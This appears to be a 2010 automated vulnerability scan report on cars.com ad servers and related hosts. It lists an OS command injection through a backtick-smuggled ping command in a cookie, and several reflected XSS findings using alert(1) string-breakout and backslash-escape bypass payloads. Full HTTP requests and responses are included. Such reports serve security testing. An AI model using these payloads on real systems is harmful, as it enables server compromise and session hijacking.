2.335. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

2.336. http://www.careerbuilder.com/PLI/R/ResDistribution.htm [Referer HTTP header]

2.337. http://www.careerbuilder.com/PLI/R/ResUpgrades.htm [Referer HTTP header]

2.338. http://www.careerbuilder.com/PLI/R/StellarResume.htm [Referer HTTP header]

2.339. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

2.340. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

2.341. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

2.342. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

2.343. http://www.careerpath.com/ [Referer HTTP header]

2.344. http://www.careerpath.com/career-tests/ [Referer HTTP header]

2.345. http://www.careerrookie.com/ [Referer HTTP header]

2.346. http://www.careerrookie.com/jobs/keyword/internships [Referer HTTP header]

2.347. http://www.cbsalary.com/ [Referer HTTP header]

2.348. http://www.cbsalary.com/ [Referer HTTP header]

2.349. http://www.cbsalary.com/salary-calculator.aspx [Referer HTTP header]

2.350. http://www.cbsalary.com/salary-calculator.aspx [Referer HTTP header]

2.351. http://www.kariera.gr/ [Referer HTTP header]

2.352. http://www.miracleworkers.com/ [Referer HTTP header]

2.353. http://www.personified.com/ [Referer HTTP header]

2.354. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 1]

2.355. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 2]

2.356. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 3]

3. Cleartext submission of password

4. SSL cookie without secure flag set

5. Session token in URL

5.1. https://secure.www.siliconvalley.com/

5.2. https://secure.www.siliconvalley.com/registration/

6. Cookie without HttpOnly flag set

6.1. https://secure.www.siliconvalley.com/

6.2. http://b.scorecardresearch.com/r

6.3. http://mngisv.112.2o7.net/b/ss/mngisv/1/H.17--NS/0

7. Cookie scoped to parent domain

7.1. http://b.scorecardresearch.com/r

7.2. http://mngisv.112.2o7.net/b/ss/mngisv/1/H.17--NS/0

8. Cross-domain Referer leakage

8.1. https://secure.www.siliconvalley.com/registration/

8.2. http://www.facebook.com/plugins/like.php

9. Cross-domain script include

9.1. https://secure.www.siliconvalley.com/

9.2. https://secure.www.siliconvalley.com/registration/

9.3. http://www.facebook.com/plugins/like.php

10. Email addresses disclosed

10.1. https://secure.extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js

10.2. https://secure.www.siliconvalley.com/

11. HTML does not specify charset



1. OS command injection  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The Registration cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the Registration cookie. The application took 47237 milliseconds to respond to the request, compared with 1819 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /go/advice/Story.jsp?section=safe&story=crashRatings&subject=crash&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=`ping%20-c%2020%20127.0.0.1`; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:35:20 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000p70wVhUcgPoKmB-tiCMuLDj:155htdomo; Path=/
Set-Cookie: Registration=currentUserId:bn6IMss6QnKWiMSyT/GWubtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLtdt8Lc+fbQm6DmHZY3u3I69QJd7cbSvCgGQdbOpYT61Vk875IzXHQo=; Expires=Sat, 14 Nov 2015 00:38:30 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:38:30 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 01:08:31 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 53075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 356 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://66.70.86.62/feed.gbmap [i parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.70.86.62
Path:   /feed.gbmap

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a0f'-alert(1)-'3c4a4687659 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659 HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true;head =
...[SNIP]...

2.2. http://66.70.86.62/feed.gbmap [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.70.86.62
Path:   /feed.gbmap

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf4'-alert(1)-'7eba7def320 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer =
...[SNIP]...

2.3. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd277\"%3balert(1)//95814bce789 was submitted in the REST URL parameter 1. This input was echoed as fd277\\";alert(1)//95814bce789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserverfd277\"%3balert(1)//95814bce789/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:06 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 583
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000fd277\\";alert(1)//95814bce789/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&
...[SNIP]...

2.4. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2848b\"%3balert(1)//7913391f575 was submitted in the REST URL parameter 2. This input was echoed as 2848b\\";alert(1)//7913391f575 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random2848b\"%3balert(1)//7913391f575=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:08 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 583
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000/acc_random2848b\\";alert(1)//7913391f575=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=728x90&c
...[SNIP]...

2.5. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d74\"%3balert(1)//bb209c18b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94d74\\";alert(1)//bb209c18b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261?94d74\"%3balert(1)//bb209c18b07=1 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:35 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 586
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261?94d74\\";alert(1)//bb209c18b07=1&relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=728x90&cTopId=20254501&V=2&cCat=Cars_Front&cSctn=vendor&rFrame=1&fmt=standard%20graphical&cDs
...[SNIP]...

2.6. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 916f0\"%3balert(1)//f22c0a0d6c2 was submitted in the REST URL parameter 1. This input was echoed as 916f0\\";alert(1)//f22c0a0d6c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver916f0\"%3balert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:47 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc916f0\\";alert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261\" target=\"_blank\">
...[SNIP]...

2.7. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d38f\"%3balert(1)//1539b4dcad0 was submitted in the REST URL parameter 2. This input was echoed as 1d38f\\";alert(1)//1539b4dcad0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random1d38f\"%3balert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:18 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/acc_random1d38f\\";alert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261\" target=\"_blank\">
...[SNIP]...

2.8. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0836\"%3balert(1)//e13954b58bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0836\\";alert(1)//e13954b58bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\"%3balert(1)//e13954b58bb=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:14 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\\";alert(1)//e13954b58bb=1\" target=\"_blank\">
...[SNIP]...

2.9. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0050\"%3balert(1)//7ed6d85a66a was submitted in the REST URL parameter 1. This input was echoed as c0050\\";alert(1)//7ed6d85a66a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserverc0050\"%3balert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:17 GMT
X-DirectServer: cvcars_DS3
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
